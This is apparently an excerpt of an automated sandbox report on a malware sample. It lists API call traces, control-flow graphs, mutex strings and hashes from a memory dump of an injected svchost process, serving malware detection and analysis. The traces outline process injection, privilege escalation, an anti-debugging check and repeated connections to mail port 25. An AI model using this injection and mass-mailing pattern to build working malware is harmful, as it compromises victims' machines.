                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 1314334A
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13143355
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131433B2
                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 131433BA
                                                                                                                                                                                • OpenMutexA.KERNEL32 ref: 131433C8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 131433DD
                                                                                                                                                                                  • Part of subcall function 1314AD3E: RegOpenKeyExA.ADVAPI32(80000002,-00000004,000000EA,00000000,000F003F,131433EC), ref: 1314AD6C
                                                                                                                                                                                  • Part of subcall function 1314AD3E: RegSetValueExA.ADVAPI32(131433EC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314AD91
                                                                                                                                                                                  • Part of subcall function 1314AD3E: RegCloseKey.ADVAPI32(131433EC), ref: 1314AD9A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpen$CountCreateExitFileHandleMutexProcessSleepStartupTickValue
                                                                                                                                                                                • String ID: LoadLibraryExA$uplcgp74169$vbknd96411$zczoiir65502
                                                                                                                                                                                • API String ID: 1822930774-3322773679
                                                                                                                                                                                • Opcode ID: d44503abb5acae26affaa828dc1f0dea3289bfaaf1818dfe82d0d955aeab762a
                                                                                                                                                                                • Instruction ID: 175d5b4083d35df8bae9dcae2fdc8861bee5e9bc7d1d616874c1029d22c04ec3
                                                                                                                                                                                • Opcode Fuzzy Hash: d44503abb5acae26affaa828dc1f0dea3289bfaaf1818dfe82d0d955aeab762a
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A11C4BA700365EFE7007BB98DC8B1E7A5CAB05258F784835EA05D2544FF38E8148A71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • gethostname.WS2_32(?,00000040), ref: 13146229
                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 13146232
                                                                                                                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?,LoadLibraryExA), ref: 1314625B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1314626D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,LoadLibraryExA), ref: 13146278
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressFreeLoadProcgethostbynamegethostname
                                                                                                                                                                                • String ID: LoadLibraryExA$SendARP$iphlpapi.dll
                                                                                                                                                                                • API String ID: 4149995341-444255208
                                                                                                                                                                                • Opcode ID: 8be703f6ceac838963bb9a41fe6ec4b7937a1430acc57a5dd30f2e302a0a1b54
                                                                                                                                                                                • Instruction ID: 7a2c4663479ef9ad84a752d5c9230923e458e2ff35e9fb1722c16f79618e7024
                                                                                                                                                                                • Opcode Fuzzy Hash: 8be703f6ceac838963bb9a41fe6ec4b7937a1430acc57a5dd30f2e302a0a1b54
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C119EB6E10319BBDB11ABF4CD8AFCE7BACAF08659F144430F901E6140E7B8D64086A0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 48 13144bc5-13144bdb HeapCreate 49 13144c13-13144c1e 48->49 50 13144bdd-13144bf3 HeapCreate 48->50 51 13144bf5-13144c05 HeapCreate 50->51 52 13144c12 50->52 51->52 53 13144c07-13144c0d GetProcessHeap 51->53 52->49 53->52
                                                                                                                                                                                APIs
                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00000000,00000000,LoadLibraryExA,?,1314337F,00000000,00016AF0,LoadLibraryExA,?), ref: 13144BD2
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,1DCD6500,00016AF0), ref: 13144BEA
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,05F5E100), ref: 13144BFC
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 13144C07
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Create$Process
                                                                                                                                                                                • String ID: LoadLibraryExA
                                                                                                                                                                                • API String ID: 846323464-2601528877
                                                                                                                                                                                • Opcode ID: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                • Instruction ID: 340928ed9c63ac25230cf3f699ca75f3c2cd4d17112b793a2d8b979986149470
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                • Instruction Fuzzy Hash: A2F0A7B06012A56FCB04AF364EC0C4BAFDCE34935C364A83EF105E2504FB3888858BB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,1315CE60,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                • PathAddBackslashA.KERNELBASE(1315CE60), ref: 131453F7
                                                                                                                                                                                  • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,1315CE60,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                • PathAppendA.SHLWAPI(1315CE60,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashEnvironmentVariablelstrlen
                                                                                                                                                                                • String ID: LoadLibraryExA
                                                                                                                                                                                • API String ID: 3711117582-2601528877
                                                                                                                                                                                • Opcode ID: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction ID: f2fba57a893278f7b18921d85e771a08421c937711f0f5b5b8013211c7d59eed
                                                                                                                                                                                • Opcode Fuzzy Hash: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE01A76B4122477EA047BA98D4EFDA3A2CDB11B59B440030F902F55C4EB94E54286A9
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • htons.WS2_32(00000FA0), ref: 131462EC
                                                                                                                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 13146307
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,13143365,00016AF0,LoadLibraryExA,?), ref: 13146316
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLasthtonssocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3100113635-0
                                                                                                                                                                                • Opcode ID: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction ID: 7cd8044a41f5419db6204b812f03637fabde0fd073de533a2041f97633ced2a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 42F04CF06103B4BBDB08ABE4CD96BA976A89F0631CF100539E526D52C5E3FC8100D732
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 91 13145417-13145420 call 131453cc 94 13145435 91->94 95 13145422-1314542f CreateFileA 91->95 95->94
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 131453CC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,1315CE60,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAddBackslashA.KERNELBASE(1315CE60), ref: 131453F7
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAppendA.SHLWAPI(1315CE60,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314333E,00016AF0,LoadLibraryExA,?), ref: 1314542F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashCreateEnvironmentFileVariable
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2777513326-0
                                                                                                                                                                                • Opcode ID: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction ID: 66e39ae68a4ad776ab8cf99ca3730a67aa31f6f4521c04cb6f79f5c4211117d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 56C048B9B61312BAFE2D1B319D5FF2B160C9710A02F28566CB202E9880BAD4A9108420
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 576 1314e012-1314e074 GetSystemTime call 1314ffd0 GetTickCount * 2 579 1314e076 576->579 580 1314e07d-1314e080 576->580 579->580 581 1314e082-1314e0ba call 13144ea1 * 2 call 13145b7d call 13144eb3 * 2 580->581 582 1314e0bd-1314e0c3 580->582 581->582 583 1314e18c-1314e19d call 1314dae3 582->583 584 1314e0c9-1314e0d0 582->584 595 1314e297-1314e2d1 shutdown closesocket call 13142f79 call 131506ce 583->595 596 1314e1a3-1314e1b7 OpenMutexA 583->596 587 1314e0e5-1314e0f7 socket 584->587 588 1314e0d2-1314e0e0 shutdown closesocket 584->588 591 1314e0fd-1314e132 call 13142f79 call 131506ce 587->591 592 1314e31e-1314e34b ExitProcess GetTickCount 587->592 588->587 617 1314e134 591->617 618 1314e13b-1314e15a htons connect 591->618 602 1314e352-1314e380 call 13144d0b htons 592->602 595->580 622 1314e2d7-1314e319 call 13144c1f call 13144ea1 * 2 call 1314df53 call 13144eb3 * 2 595->622 599 1314e1c7-1314e1e8 call 13144c1f GetTickCount call 1314df98 596->599 600 1314e1b9-1314e1c1 CreateMutexA 596->600 599->580 632 1314e1ee-1314e20a call 13142f79 call 131506ce 599->632 600->599 619 1314e383-1314e389 602->619 617->618 624 1314e15c-1314e167 call 1314d177 618->624 625 1314e169-1314e174 GetLastError Sleep 618->625 626 1314e3e9 619->626 627 1314e38b-1314e3b5 call 13142f79 DnsQuery_A 619->627 622->580 629 1314e17a-1314e186 624->629 625->629 631 1314e3eb-1314e3f1 626->631 641 1314e3b7-1314e3db call 13144d0b DnsRecordListFree 627->641 642 1314e3e0-1314e3e7 627->642 629->580 629->583 637 1314e462-1314e46f 631->637 638 1314e3f3-1314e3f9 631->638 662 1314e20c-1314e218 closesocket 632->662 663 1314e21d-1314e249 call 13142f79 call 131506ce GetTickCount 632->663 646 1314e471-1314e478 637->646 647 1314e48a-1314e4aa call 13142f79 call 131506ce 637->647 644 1314e457-1314e460 638->644 645 1314e3fb-1314e43f socket setsockopt connect 638->645 641->642 642->619 642->626 644->631 644->637 652 1314e451-1314e452 closesocket 645->652 653 1314e441-1314e44c recv 645->653 654 1314e479-1314e47b 646->654 647->602 670 1314e4b0-1314e4b6 647->670 652->644 653->652 660 1314e484-1314e488 654->660 661 1314e47d 654->661 660->647 660->654 661->660 662->663 663->580 678 1314e24f-1314e28a Sleep call 13142f79 call 131506ce GetTickCount 663->678 670->602 673 1314e4bc-1314e4ca Sleep 670->673 673->670 676 1314e4cc 673->676 676->602 685 1314e28c-1314e292 678->685 685->580
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTime.KERNEL32(?,00020000,76B5EEA0,00000000), ref: 1314E01F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E03A
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E041
                                                                                                                                                                                • shutdown.WS2_32(?,00000002), ref: 1314E0D5
                                                                                                                                                                                • closesocket.WS2_32(?), ref: 1314E0E0
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 1314E0EA
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E13E
                                                                                                                                                                                • connect.WS2_32(00000002,00000010,00000019), ref: 1314E153
                                                                                                                                                                                • GetLastError.KERNEL32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E169
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1314E174
                                                                                                                                                                                • OpenMutexA.KERNEL32 ref: 1314E1AF
                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000), ref: 1314E1C1
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E1D8
                                                                                                                                                                                • closesocket.WS2_32(-00000004), ref: 1314E218
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E23F
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1314E254
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E27C
                                                                                                                                                                                • shutdown.WS2_32(00000002,00000000), ref: 1314E2A5
                                                                                                                                                                                • closesocket.WS2_32 ref: 1314E2B0
                                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000002,00000001,00000000), ref: 1314E31E
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E337
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E377
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3AE
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3DB
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 1314E401
                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E423
                                                                                                                                                                                • connect.WS2_32(00000000,00000002,00000010), ref: 1314E438
                                                                                                                                                                                • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E44C
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314E452
                                                                                                                                                                                • Sleep.KERNEL32(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$closesocket$Sleep$Mutexconnecthtonsshutdownsocket$CreateErrorExitFreeLastListOpenProcessQuery_RecordSystemTimerecvsetsockopt
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 850683436-3203441087
                                                                                                                                                                                • Opcode ID: 8b408f48c3bc08d1c33e2562351dbb6a722b9b3fec20a88ced0e7994191db2e9
                                                                                                                                                                                • Instruction ID: b517c613e26f4d778944e9f90759b52dc2cffeb791a3b3e77eda24470bf5b908
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b408f48c3bc08d1c33e2562351dbb6a722b9b3fec20a88ced0e7994191db2e9
                                                                                                                                                                                • Instruction Fuzzy Hash: 8AC1CEB5944359BBDB12AFB8CCC5AAEB779FB05708F24443AE105A3150EB38A940CF61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1071 131451e8-131451f7 1072 13145205-13145211 call 1314515f 1071->1072 1073 131451f9-131451fc 1071->1073 1078 13145213-1314521a 1072->1078 1079 1314521e-1314526a call 13144d0b * 2 GetCommandLineA 1072->1079 1073->1072 1074 131451fe-13145200 1073->1074 1076 131453c5-131453c7 1074->1076 1078->1079 1084 13145280-13145291 call 13144dc2 1079->1084 1085 1314526c-1314527b StrStrA 1079->1085 1089 13145294 1084->1089 1085->1084 1086 1314527d 1085->1086 1086->1084 1090 1314529b-131452b6 CreateProcessA 1089->1090 1091 131452e3-1314530d call 13142f79 call 13144dc2 1090->1091 1092 131452b8-131452d7 VirtualAllocEx 1090->1092 1091->1090 1108 1314530f 1091->1108 1093 13145311-13145315 1092->1093 1094 131452d9-131452dd TerminateProcess 1092->1094 1097 131453c0-131453c2 1093->1097 1098 1314531b-13145333 WriteProcessMemory 1093->1098 1094->1091 1100 131453c3-131453c4 1097->1100 1101 131453c8-131453ca 1098->1101 1102 13145339-13145342 1098->1102 1100->1076 1101->1100 1104 13145344 1102->1104 1105 1314539b-131453af CreateRemoteThread 1102->1105 1109 1314534a-1314534e 1104->1109 1106 131453b7-131453ba CloseHandle 1105->1106 1107 131453b1 GetLastError 1105->1107 1106->1097 1107->1106 1108->1089 1110 13145387-13145394 1109->1110 1111 13145350-13145354 1109->1111 1110->1109 1114 13145396-13145399 1110->1114 1112 13145356-13145369 1111->1112 1113 1314536b-1314537a 1111->1113 1115 1314537d-13145385 WriteProcessMemory 1112->1115 1113->1115 1114->1105 1115->1101 1115->1110
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCommandLineA.KERNEL32(?,?,?,76B7EA30,00000000,00000000), ref: 1314525F
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131413B4,?,?,?,76B7EA30,00000000,00000000), ref: 13145273
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,1315CA60,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 131452AE
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,1314DFE7,00003000,00000040,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 131452CC
                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131452DD
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 1314532F
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 13145381
                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 131453A7
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453B1
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453BA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CreateMemoryWrite$AllocCloseCommandErrorHandleLastLineRemoteTerminateThreadVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3159359046-0
                                                                                                                                                                                • Opcode ID: 1cdf0ba31d3df51b1ca675a12fdd714688cd5e20231d95114aa2ea4851b52865
                                                                                                                                                                                • Instruction ID: 9f4360f81229b30285b795f83172b076a51dca0beb3177dc1979ede44291ec0a
                                                                                                                                                                                • Opcode Fuzzy Hash: 1cdf0ba31d3df51b1ca675a12fdd714688cd5e20231d95114aa2ea4851b52865
                                                                                                                                                                                • Instruction Fuzzy Hash: CD511AB1A00249FFEB11DBA5CD84FAEBBB8EB08744F244529F905E6541E774AA40CB64
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,131475E5,00000000,?), ref: 1314F303
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008), ref: 1314F34C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction ID: 1b3e8c1011e641e1cdb24f2e55c5aaff6d5e64cf1874f51b9794b8ca93c75a3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2751A375F44209ABDF05CFA99984AAEB7B6EFC8300F38847AE044B7240DF745A55CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a22aa4305c2437969735b4f63c706147fcbcfb90283b6e929a72bdf4f274c3fe
                                                                                                                                                                                • Instruction ID: 9013d5642ba9b290c7d7ccf9ccdc78394776347b157038a72ed5d1254986133d
                                                                                                                                                                                • Opcode Fuzzy Hash: a22aa4305c2437969735b4f63c706147fcbcfb90283b6e929a72bdf4f274c3fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A914972A003149FEB289F7CCC81ABE77EAFB44750F25052AF96597180DB75EC858B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 13153DA0
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 13153DB5
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(13142208), ref: 13153DC0
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 13153DDC
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 13153DE3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                • Opcode ID: 935675d6a9079c6f15d832578c4500ab83153b337d2e4654ff363f27782184c8
                                                                                                                                                                                • Instruction ID: a6ec819b272d0227f2426482cb05374603522a6e20c87f3b779028f3a84bc2f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 935675d6a9079c6f15d832578c4500ab83153b337d2e4654ff363f27782184c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 7621E3B5900326EFD36ADF28D5E4A443BB8FB4970CF10842EF618C3642E3B555818FA5
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00000028,00000000), ref: 13145171
                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,-00000004,000000C0), ref: 13145196
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131451A3
                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,1314520A), ref: 131451D5
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 131451DB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$AdjustCloseErrorHandleLastLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 379965542-0
                                                                                                                                                                                • Opcode ID: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction ID: e3e4a8bb1a1ccb54afa2876179f54043ec6020984c21c5fd6df84cfc700c439a
                                                                                                                                                                                • Opcode Fuzzy Hash: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction Fuzzy Hash: FC010CB5A50259EFEB00EFA5CD49FEEBBBCFB04709F200125E516E2190E7749A448B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 13152FF9
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315300A
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,1468EFF1,00000104), ref: 13153026
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 1315303B
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315304E
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153057
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153064
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13153091
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530A4
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530B5
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530C6
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530D7
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,?,00000000,775D4620,00000003,13153159,000000FC,13152882,00000001,00000000,00000000,?,13152F12,?,00000001), ref: 131530F6
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153117
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13153121
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
